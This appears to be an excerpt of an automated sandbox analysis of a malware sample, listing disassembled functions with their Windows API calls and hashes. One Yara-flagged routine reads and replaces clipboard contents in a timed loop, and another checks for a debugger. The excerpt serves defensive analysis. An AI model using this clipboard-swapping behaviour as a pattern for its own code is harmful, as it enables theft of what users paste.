                                                              • API ID: Exception@8Throw
                                                              • String ID:
                                                              • API String ID: 2005118841-0
                                                              • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                              • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                              • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                              • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Getctype
                                                              • String ID:
                                                              • API String ID: 2085600672-0
                                                              • Opcode ID: 7bcbef9a924f57a23f140ac2bfa8bc84d39cfe862c52aa817c005c5a995eb04b
                                                              • Instruction ID: 9e35d067b5090186e2253e8cafc45fe8648da69d29aab184c5b356960a576dda
                                                              • Opcode Fuzzy Hash: 7bcbef9a924f57a23f140ac2bfa8bc84d39cfe862c52aa817c005c5a995eb04b
                                                              • Instruction Fuzzy Hash: 29E086736005145B8701EE9D98819CBF7ECFE4A320300807BF909DF202D6B1A90886F4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Deallocate
                                                              • String ID:
                                                              • API String ID: 1075933841-0
                                                              • Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                              • Instruction ID: fec367d8aa59221bd54f7e77a34cd6e8baa5892bd02020f9b8e7ed08d49e55ed
                                                              • Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                              • Instruction Fuzzy Hash: 71D067B1518611CEE764DF69E444656B7E4EF04310B24492FE4D9D2694E6749880CB44
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                              • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                              • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                              • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008DE2D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_8dd000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 349dbba469a38cd92f2a36e0c5618d7315464f9eb16f7f6f9dfe16612e683eb5
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: DF112B79A00208EFDB01DF98C985E98BBF5EF08350F058095F9489B362D371EA50EB80
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0247194D
                                                              • Sleep.KERNEL32(00001541), ref: 02471957
                                                                • Part of subcall function 0247CE77: _strlen.LIBCMT ref: 0247CE8E
                                                              • OpenClipboard.USER32(00000000), ref: 02471984
                                                              • GetClipboardData.USER32(00000001), ref: 02471994
                                                              • _strlen.LIBCMT ref: 024719B0
                                                              • _strlen.LIBCMT ref: 024719DF
                                                              • _strlen.LIBCMT ref: 02471B23
                                                              • EmptyClipboard.USER32 ref: 02471B39
                                                              • GlobalAlloc.KERNEL32(00000002,00000001), ref: 02471B46
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02471B70
                                                              • SetClipboardData.USER32(00000001,00000000), ref: 02471B79
                                                              • GlobalFree.KERNEL32(00000000), ref: 02471B80
                                                              • CloseClipboard.USER32 ref: 02471BA4
                                                              • Sleep.KERNEL32(000002D2), ref: 02471BAF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                              • String ID: 4#E$i
                                                              • API String ID: 4246938166-2480119546
                                                              • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                              • Instruction ID: 298b8b0c4fbb2f95e2a549cbd02ea28dd9dae5447529ee76f9fe55d805f2df1f
                                                              • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                              • Instruction Fuzzy Hash: 50512430C00794DAE7119FA4ED45BED7B74FF2A306F04522AD809A2172EB709685CB69
                                                              APIs
                                                              • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0247239C
                                                              • GetClientRect.USER32(?,?), ref: 024723B1
                                                              • GetDC.USER32(?), ref: 024723B8
                                                              • CreateSolidBrush.GDI32(00646464), ref: 024723CB
                                                              • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024723EA
                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0247240B
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02472416
                                                              • MulDiv.KERNEL32(00000008,00000000), ref: 0247241F
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02472443
                                                              • SetBkMode.GDI32(?,00000001), ref: 024724CE
                                                              • _wcslen.LIBCMT ref: 024724E6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                              • String ID:
                                                              • API String ID: 1529870607-0
                                                              • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                              • Instruction ID: 472f69582a65b026421a699589cae298f55ecf5e302f3a7551bcf3816fd69b57
                                                              • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                              • Instruction Fuzzy Hash: 7571ED72900228AFDB62DF64DD85FAEBBBCEB09751F0041A5F509E6155DA70AF84CF20
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                              • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                              • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                              • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                              • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024ABCF4,?,00000000), ref: 024ABA6E
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024ABCF4,?,00000000), ref: 024ABA97
                                                              • GetACP.KERNEL32(?,?,024ABCF4,?,00000000), ref: 024ABAAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                              • Instruction ID: ed2214ac0c159f1f5d33b7d022289b03c00b33e6c91c490dd3f30d079a01211e
                                                              • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                              • Instruction Fuzzy Hash: A6217132701105AAEB348F54D921BA777A6EB74E5CB56C166E90BDB310F732DE81C390
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                              • String ID:
                                                              • API String ID: 2287132625-0
                                                              • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                              • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                              • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                              • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                              APIs
                                                                • Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A21A0
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024ABCB5
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 024ABD10
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 024ABD1F
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,024A0A1C,00000040,?,024A0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024ABD67
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,024A0A9C,00000040), ref: 024ABD86
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                              • String ID:
                                                              • API String ID: 2287132625-0
                                                              • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                              • Instruction ID: f39d98138fc9caf841d53f0a252733b97d08d496ac0f154d6704bd27d57516a5
                                                              • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                              • Instruction Fuzzy Hash: E3518071900209ABEB11DFA5DC54EBB77B9FF35708F04042FE904EB290EB719A458B61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C$C
                                                              • API String ID: 0-238425240
                                                              • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                              • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                              • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                              • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                              • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                              • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                              • String ID:
                                                              • API String ID: 2444527052-0
                                                              • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                              • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                              • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                              • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                              APIs
                                                                • Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
                                                                • Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
                                                                • Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024A0A23,?,?,?,?,024A047A,?,00000004), ref: 024AB353
                                                              • _wcschr.LIBVCRUNTIME ref: 024AB3E3
                                                              • _wcschr.LIBVCRUNTIME ref: 024AB3F1
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024A0A23,00000000,024A0B43), ref: 024AB494
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                              • String ID:
                                                              • API String ID: 2444527052-0
                                                              • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                              • Instruction ID: 11f06087d66e941983c32c890548f9314098312aa69c78252939f7d3e4083064
                                                              • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                              • Instruction Fuzzy Hash: AC61D672600306AAEB25AB75DC65BBB73A9EF34718F14442FE905DB280EB74D541CBA0
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorInfoLastLocale$_free
                                                              • String ID:
                                                              • API String ID: 2834031935-0
                                                              • Opcode ID: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
                                                              • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                              • Opcode Fuzzy Hash: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
                                                              • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                              • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                              • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                              • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0247DAD7), ref: 0249A732
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0247DAD7), ref: 0249A73C
                                                              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0247DAD7), ref: 0249A749
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                              • Instruction ID: 0b2e93ba2950da1c8cccccb63699f4fe7742ba26b32d44f259996fcecca0737f
                                                              • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                              • Instruction Fuzzy Hash: E531C47491132C9BCB21EF65D98879DBBB8BF08710F5042EAE41CA7260E7349F858F45
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                              • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                              • ExitProcess.KERNEL32 ref: 0042FE99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                              • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                              • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                              • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,024A009C,00000000,00457970,0000000C,024A01F3,00000000,00000002,00000000), ref: 024A00E7
                                                              • TerminateProcess.KERNEL32(00000000,?,024A009C,00000000,00457970,0000000C,024A01F3,00000000,00000002,00000000), ref: 024A00EE
                                                              • ExitProcess.KERNEL32 ref: 024A0100
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                              • Instruction ID: a3fff2fd7053afa5b0704e78949c652652a7e07a9cad83244e716aa3a97a675d
                                                              • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                              • Instruction Fuzzy Hash: D4E04635000148ABCF126F54DD18B493B6AEB12B42F008029F9048B270CB36DA42DE40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$GetProcAddress.$l
                                                              • API String ID: 0-2784972518
                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction ID: 2ba03358afb4aa586080315134d9a6fa806d0697afe7ce4ec3d947c4ea805d1a
                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction Fuzzy Hash: AB3147B6911609DFDB10CF99C880AEEBBF9FF48324F15504AD851A7310D771EA45CBA4
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: GetLocaleInfoEx
                                                              • API String ID: 2299586839-2904428671
                                                              • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                              • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                              • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                              • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                              • Instruction ID: 0e7d969b980ba6dfd04e8a54758ca7fe4a2fce6f8c0d4c53bda4dffab6b2fe6b
                                                              • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                              • Instruction Fuzzy Hash: E3021A71E002199BDF14CFA9C9806AEBBF5EF88314F25826AD919E7384D731A945CF80
                                                              APIs
                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0247262C
                                                              • PostQuitMessage.USER32(00000000), ref: 024727CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessageNtdllPostProc_QuitWindow
                                                              • String ID:
                                                              • API String ID: 4264772764-0
                                                              • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                              • Instruction ID: 87c017268568291181d22e74da28774018b180f19e1a84941c1995f0bc980cca
                                                              • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                              • Instruction Fuzzy Hash: E941412596438095E730FFA5BC45B6633B0FF64B22F10252BD528CB2B2E3B28540C75E
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
